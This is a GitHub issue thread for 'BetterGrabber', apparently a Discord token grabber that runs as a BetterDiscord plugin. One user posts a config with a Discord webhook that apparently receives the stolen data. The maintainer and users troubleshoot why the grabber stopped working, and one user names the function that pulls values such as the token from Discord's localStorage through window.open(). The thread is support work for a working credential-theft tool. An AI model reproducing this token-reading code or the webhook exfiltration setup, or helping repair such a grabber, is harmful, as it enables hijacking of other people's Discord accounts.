### ISSUE TITLE
window.open().localStorage patched

### ISSUE THREAD

**Issue by Sief1334** [HideakiAtsuyo/BetterGrabber#17]
**Config**
```js
  {
    pingOnResult: true,
    webHook: "/api/webhooks/943526060115525654/qFMzk_JDbn9r_N-ExCE8kKg7b8Pfpa-WZK9sM3zNy0uMGSEqaBDPamHCwJf-SoI-2HGS",
    webhookUsername: "Hello World",
    webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",

    embedTitle: "Hello World",
    embedColor: 0x36393f,

    tts: false
}
```

**Problem**

Mon problème je fais comme vous sur la vidéo et sa me fait rien

**Comment by HideakiAtsuyo** [comment]
> 

1) `Ctrl + Shift + I`
2) Select `Console`
3) Reload Discord
4) Send the error here

**Comment by Sief1334** [comment]
Can you anydesk https://www.anydesk.com/fr

**Comment by HideakiAtsuyo** [comment]
> Can you anydesk https://www.anydesk.com/fr
> 
> Because I did ctrl + shift + i and on discord it shows me nothing

![](https://i.imgur.com/1DoIPC0.png)

**Comment by Sief1334** [comment]
![image](https://user-images.githubusercontent.com/96451048/154302079-7fe3d484-ae96-449e-a94a-8c9c6fdfed64.png)

**Comment by Sief1334** [comment]
![image](https://user-images.githubusercontent.com/96451048/154302152-19277f3f-4151-452b-a030-b51f307fd3bc.png)

**Comment by Sief1334** [comment]
![image](https://user-images.githubusercontent.com/96451048/154302243-e41fb94b-418e-48fd-8e2b-220996890e8a.png)

**Comment by HideakiAtsuyo** [comment]
> ![image](https://user-images.githubusercontent.com/96451048/154302152-19277f3f-4151-452b-a030-b51f307fd3bc.png)

https://github.com/HideakiAtsuyo/BetterGrabber/issues/17#issuecomment-1041717693

Show the erros only, errors are red.

**Comment by Sief1334** [comment]
![image](https://user-images.githubusercontent.com/96451048/154302410-dc5d601d-a6f0-4d42-8e69-53d62e5dbca5.png)

**Comment by HideakiAtsuyo** [comment]
> ![image](https://user-images.githubusercontent.com/96451048/154302410-dc5d601d-a6f0-4d42-8e69-53d62e5dbca5.png)

No new error when you `ctrl +r` ? the sh thing is a normal error from Discord :)

**Comment by Sief1334** [comment]
Yes I do ctrl r and nothing happens

**Comment by Sief1334** [comment]
Normal discord

**Comment by lunixw4rh13r** [comment]
I think its the same problem that I have

btw the 3 errors are the plugin but changed and one is obfuscated all worked but then I updated better discord to version 1.5.2 and now it stopped working :(
![image](https://user-images.githubusercontent.com/98909106/154591745-342eb19f-526e-47b7-bf31-e2d4b123ee89.png)

**Comment by lunixw4rh13r** [comment]
Its this function:
```
function Info(info){
            return new Promise(async (resolve, reject) => {
                return resolve(window.open().localStorage[info])
            });
        }
```

**Comment by HideakiAtsuyo** [comment]
> Its this function:
> 
> ```
> function Info(info){
>             return new Promise(async (resolve, reject) => {
>                 return resolve(window.open().localStorage[info])
>             });
>         }
> ```

I will update Discord & Better Discord I will tell you if it work on my side

**Comment by HideakiAtsuyo** [comment]
It's a Discord problem not Better I think, I will update it later :)

**Comment by lunixw4rh13r** [comment]
> It's a Discord problem not Better I think, I will update it later :)

Thanks man

**Comment by HideakiAtsuyo** [comment]
> accept discord fa name: Drip @HideakiAtsuyo

My DMs are not a support place and we can talk here :)

**Comment by lunixw4rh13r** [comment]
I dont need support bro i got a nice feature you could implement I did and it worked perfectly

**Comment by HideakiAtsuyo** [comment]
> I dont need support bro i got a nice feature you could implement I did and it worked perfectly

Then you can send it [here](https://github.com/HideakiAtsuyo/BetterGrabber/issues/15) with some explanations ! :)

**Comment by HideakiAtsuyo** [comment]
Closed & Locked until 25 Stars.
